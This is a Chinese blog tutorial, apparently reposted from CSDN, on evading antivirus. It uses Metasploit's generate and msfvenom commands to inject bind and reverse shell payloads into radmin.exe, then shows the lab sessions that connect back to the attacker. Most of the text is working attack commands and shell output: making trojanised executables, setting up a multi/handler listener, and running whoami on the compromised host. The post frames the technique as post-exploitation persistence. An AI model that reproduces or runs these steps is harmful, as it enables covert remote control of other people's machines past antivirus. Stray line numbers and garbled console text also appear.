記一次payload繞過電腦管家免殺
一、msf命令提示符下generate命令生成
1、首先可以使用show payloads命令檢視所有的payload,然後使用use命令選中其中一個。
msf5 > show payloads
Payloads
========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 aix/ppc/shell_bind_tcp manual No AIX Command Shell, Bind TCP Inline
1 aix/ppc/shell_find_port manual No AIX Command Shell, Find Port Inline
2 aix/ppc/shell_interact manual No AIX execve Shell for inetd
3 aix/ppc/shell_reverse_tcp manual No AIX Command Shell, Reverse TCP Inline
...
...
559 windows/x64/vncinject/reverse_tcp_uuid manual No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
560 windows/x64/vncinject/reverse_winhttp manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
561 windows/x64/vncinject/reverse_winhttps manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2、使用generate -h檢視命令幫助
msf5 payload(windows/shell_bind_tcp) > generate -h
Usage: generate [options]
Generates a payload. Datastore options may be supplied after normal options.
Example: generate -f python LHOST=127.0.0.1
OPTIONS:
-E Force encoding
-O <opt> Deprecated: alias for the '-o' option
-P <opt> Total desired payload size, auto-produce appropriate NOP sled length
-S <opt> The new section name to use when generating (large) Windows binaries
-b <opt> The list of characters to avoid example: '\x00\xff'
-e <opt> The encoder to use
-f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-h Show this message
-i <opt> The number of times to encode the payload
-k Preserve the template behavior and inject the payload as a new thread
-n <opt> Prepend a nopsled of [length] size on to the payload
-o <opt> The output file name (otherwise stdout)
-p <opt> The platform of the payload
-v Verbose output (display stage in addition to stager)
-x <opt> Specify a custom executable file to use as a template
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
generate常用選項解釋:
-b 去掉壞字元,例如:-b ‘\x00\xff’
-e 設定編碼方式,可以使用show encoders命令檢視所有編碼方式
-f 輸出格式,不設定預設為ruby語言。例如-f c或-f exe
-i 設定編碼次數,一般用作多次編碼免殺
-k 保持源模版行為,並將payload作為一個執行緒注入到一個程序中,常和-x配合使用
-o 輸出檔名
-x 定義一個檔案作為模版
3、generate命令生成windows/shell_bind_tcp的payload,並注入到radmin程式中
msf5 payload(windows/shell_bind_tcp) > generate -k -x /usr/share/windows-binaries/radmin.exe -f exe -o rradin.exe
[*] Writing 1319424 bytes to rradin.exe...
1
2
4、生成payload,在靶機開啟rradmin.exe後,指定的4444埠被開啟,遠端使用nc連線如下圖
luredeMacBook-Pro:~ lure$ nc 10.10.10.166 4444
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ��
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely
C:\Users\lovely\Desktop>
1
2
3
4
5
6
7
8
9
5、有坑注意。msf的payload中有windows/shell/bind_tcp和windows/shell_bind_tcp,其為兩個作者所做,經過測試,在使用nc連線windows/shell/bind_tcp生成的payload時,會產生連線成功,但無返回資料的bug。
二、kali下使用msfvenom命令生成
1、使用–list payloads選項檢視所有payload
root@kali2020:~# msfvenom --list payloads
Framework Payloads (562 total) [--payload <value>]
==================================================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
......
1
2
3
4
5
6
7
8
9
10
11
12
13
2、使用–list-options檢視可用引數
root@kali2020:~# msfvenom -p windows/shell_reverse_tcp --list-options
Options for payload/windows/shell_reverse_tcp:
=========================
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 324
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
3、使用msfvenom生成payload並注入到radmin程序中
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
1
root@kali2020:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 1319424 bytes
Saved as: r2admin.exe
1
2
3
4
5
6
7
4、靶機執行r2admin,並在攻擊機用msfconsole接收反彈shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 9876
lport => 9876
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:9876
[*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400
pwd
pwd
'pwd' �����ڲ����ⲿ���Ҳ���ǿ����еij���
�������ļ���
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
三、小結
msfconsole下的generate與msfvomen命令實際是不同環境下的同一個命令,其功能基本相同,這裡我們要學習的重點是使用-k -x 選項將payload注入到可以執行檔案exe中,這項技能在實戰中後滲透測試的可持久化中經常會被用到。
————————————————
版權宣告:本文為CSDN博主「redwand」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處連結及本宣告。
原文連結:https://blog.csdn.net/redwand/article/details/107503304